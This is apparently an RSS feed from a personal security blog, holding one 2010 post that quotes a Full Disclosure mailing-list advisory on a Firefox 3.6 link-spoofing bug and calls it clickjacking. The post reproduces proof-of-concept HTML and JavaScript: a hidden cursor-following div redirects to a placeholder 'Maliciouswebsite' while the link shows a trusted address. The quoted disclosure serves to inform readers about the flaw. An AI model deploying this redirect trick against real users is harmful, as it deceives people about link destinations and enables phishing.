<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Xanda's Blog !~! &#187; full disclosure</title>
	<atom:link href="http://blog.xanda.org/tag/full-disclosure/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.xanda.org</link>
	<description>Human Knowledge Belongs To The World.</description>
	<lastBuildDate>Mon, 30 Aug 2010 03:17:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Phishing or Clickjacking?</title>
		<link>http://blog.xanda.org/2010/02/26/phishing-or-clickjacking/</link>
		<comments>http://blog.xanda.org/2010/02/26/phishing-or-clickjacking/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 16:04:17 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[IT Related]]></category>
		<category><![CDATA[clickjacking]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[full disclosure]]></category>
		<category><![CDATA[mozilla]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1070</guid>
		<description><![CDATA[I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds. Here is one thing that made me smile: Mozilla firefox 3.6 unpatched phishing vulnerability From: bugsbanned () hushmail com Date: Wed, 24 Feb 2010 19:29:33 -0300 &#8230;Unpatched bug since Mozilla firefox 3.0&#8230; Mozilla &#8220;INsecurity team&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.</p>
<p>Here is one thing that made me smile:</p>
<blockquote><p><strong>Mozilla firefox 3.6 unpatched phishing vulnerability</strong></p>
<p>From: bugsbanned () hushmail com<br />
Date: Wed, 24 Feb 2010 19:29:33 -0300</p>
<p>&#8230;Unpatched bug since Mozilla firefox 3.0&#8230;</p>
<p>Mozilla &#8220;INsecurity team&#8221; remember, security through obscurity just<br />
DOESN&#8217;T WORK&#8230;<br />
Locking down bugzilla advisories even the 2 years old ones is<br />
unnecessary and lame.</p>
<p>&lt;html&gt;<br />
&lt;body&gt;<br />
&lt;div id=&#8221;mydiv&#8221;<br />
onmouseover=&#8221;document.location=&#8217;http://Maliciouswebsite&#8217;;&#8221;<br />
style=&#8221;position:absolute;width:2px;height:2px;background:#FFFFFF;bor<br />
der:0px&#8221;&gt;&lt;/div&gt;<br />
&lt;script&gt;<br />
function updatebox(evt) {<br />
mouseX=evt.pageX?evt.pageX:evt.clientX;<br />
mouseY=evt.pageY?evt.pageY:evt.clientY;<br />
document.getElementById(&#8216;mydiv&#8217;).style.left=mouseX-1;<br />
document.getElementById(&#8216;mydiv&#8217;).style.top=mouseY-1;<br />
}<br />
&lt;/script&gt;<br />
&lt;br&gt;<br />
&lt;a href=&#8221;http://trustedwebsite&#8221;; onclick=&#8221;updatebox(event)&#8221;&gt;&lt;font<br />
style=&#8221;font-family:arial;font-size:32px&#8221;&gt;http://trusted<br />
website&lt;/font&gt;&lt;/a&gt;&lt;br&gt;</p>
<p>&lt;/div&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p>For example:</p>
<p>&lt;html&gt;<br />
&lt;body&gt;<br />
&lt;div id=&#8221;mydiv&#8221;<br />
onmouseover=&#8221;document.location=&#8217;http://www.wikipedia.org&#8217;;&#8221;<br />
style=&#8221;position:absolute;width:2px;height:2px;background:#FFFFFF;bor<br />
der:0px&#8221;&gt;&lt;/div&gt;<br />
&lt;script&gt;<br />
function updatebox(evt) {<br />
mouseX=evt.pageX?evt.pageX:evt.clientX;<br />
mouseY=evt.pageY?evt.pageY:evt.clientY;<br />
document.getElementById(&#8216;mydiv&#8217;).style.left=mouseX-1;<br />
document.getElementById(&#8216;mydiv&#8217;).style.top=mouseY-1;<br />
}<br />
&lt;/script&gt;<br />
&lt;br&gt;<br />
&lt;a href=&#8221;http://www.google.com&#8221;; onclick=&#8221;updatebox(event)&#8221;&gt;&lt;font<br />
style=&#8221;font-family:arial;font-<br />
size:32px&#8221;&gt;http://www.google.com&lt;/font&gt;&lt;/a&gt;&lt;br&gt;</p>
<p>&lt;/div&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p>Source:www exploit-db com</p></blockquote>
<p>Phishing huh? To me its clickjacking <img src='http://blog.xanda.org/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Source: <a href="http://seclists.org/fulldisclosure/2010/Feb/434" target="_blank">http://seclists.org/fulldisclosure/2010/Feb/434</a></p>
<p>P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to <img src='http://blog.xanda.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/02/26/phishing-or-clickjacking/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
